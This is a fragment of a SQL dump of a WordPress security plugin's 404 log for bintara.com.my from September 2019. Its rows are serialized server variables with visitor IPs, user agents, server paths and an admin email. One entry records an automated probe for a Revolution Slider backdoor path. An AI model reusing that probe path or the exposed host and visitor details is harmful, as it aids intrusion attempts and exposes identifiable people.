PaleMoon/27.9.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYiV6bp66oO1SlzUVT6wfQAAAcQ\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:13:\"117.27.81.123\";s:11:\"REMOTE_PORT\";s:5:\"33918\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYiV6bp66oO1SlzUVT6wfQAAAcQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569232361.8819\";s:12:\"REQUEST_TIME\";s:10:\"1569232361\";}}','notice','2019-09-23 09:52:44','2019-09-23 09:52:42',31147120,32947320,'https://bintara.com.my/our-history/about1/',1,0,'117.27.81.123'),(26863,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:82:\"https://bintara.com.my/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:60:\"/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYh2TLBAWOqnjv6og71EzAAAARM\";s:19:\"REDIRECT_SCRIPT_URI\";s:82:\"https://bintara.com.my/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:60:\"/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYh2TLBAWOqnjv6og71EzAAAARM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"47.89.208.37\";s:11:\"REMOTE_PORT\";s:5:\"59580\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:82:\"https://bintara.com.my/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:10:\"SCRIPT_URL\";s:60:\"/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYh2TLBAWOqnjv6og71EzAAAARM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569224268.4315\";s:12:\"REQUEST_TIME\";s:10:\"1569224268\";}}','notice','2019-09-23 07:37:50','2019-09-23 07:37:48',30789280,32603672,'https://bintara.com.my/wp-content/plugins/revslider/temp/update_extract/199877.php',1,0,'47.89.208.37'),(26861,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.106 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"223.206.242.40\";s:11:\"REMOTE_PORT\";s:5:\"56820\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYhwocFqgMX-PLsgt8dD9wAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569222818.0639\";s:12:\"REQUEST_TIME\";s:10:\"1569222818\";}}','notice','2019-09-23 07:13:39','2019-09-23 07:13:38',30811024,32619056,'https://bintara.com.my/?page_id=18',1,0,'223.206.242.40'),(26862,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"57879\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYh0L2LkiuNLQQwjy5lHNgAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569223728.0275\";s:12:\"REQUEST_TIME\";s:10:\"1569223728\";}}','notice','2019-09-23 07:28:50','2019-09-23 07:28:48',30812896,32629120,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(26860,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/D3117A87\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"223.206.242.40\";s:11:\"REMOTE_PORT\";s:5:\"61344\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYhwddgT8SLwZ2vcJZw8ngAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569222773.5015\";s:12:\"REQUEST_TIME\";s:10:\"1569222773\";}}','notice','2019-09-23 07:12:55','2019-09-23 07:12:53',30812344,32627192,'https://bintara.com.my/?page_id=18',1,0,'223.206.242.40'),(26859,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"9085B457-83A3-4FFE-90D7-DA6611856CF6\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYhdXWLkiuNLQQwjy5lD2QAAAMY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"183.171.185.46\";s:11:\"REMOTE_PORT\";s:5:\"50498\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYhdXWLkiuNLQQwjy5lD2QAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569217885.7116\";s:12:\"REQUEST_TIME\";s:10:\"1569217885\";}}','notice','2019-09-23 05:51:28','2019-09-23 05:51:26',31484072,33291112,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.185.46'),(26858,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"95.165.163.188\";s:11:\"REMOTE_PORT\";s:5:\"36735\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYhTQtgT8SLwZ2vcJZwvDwAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569215298.2701\";s:12:\"REQUEST_TIME\";s:10:\"1569215298\";}}','notice','2019-09-23 05:08:20','2019-09-23 05:08:18',31206824,33025152,'https://bintara.com.my/?page_id=18',1,0,'95.165.163.188'),(26857,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:62:\"Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv 11.0) like Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYhSGMFqgMX-PLsgt8c9rAAAAIU\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:12:\"47.56.95.125\";s:11:\"REMOTE_PORT\";s:5:\"49997\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYhSGMFqgMX-PLsgt8c9rAAAAIU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569215000.3492\";s:12:\"REQUEST_TIME\";s:10:\"1569215000\";}}','notice','2019-09-23 05:03:22','2019-09-23 05:03:20',30752192,32568936,'https://bintara.com.my/our-history/about1/',1,0,'47.56.95.125'),(26856,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"3928C426-B168-4B28-BDF3-511F089CBC1B\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYhHodgT8SLwZ2vcJZwnBwAAABY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"183.171.64.123\";s:11:\"REMOTE_PORT\";s:5:\"38269\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYhHodgT8SLwZ2vcJZwnBwAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569212321.7756\";s:12:\"REQUEST_TIME\";s:10:\"1569212321\";}}','notice','2019-09-23 04:18:43','2019-09-23 04:18:42',31087024,32899752,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.64.123'),(26855,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; 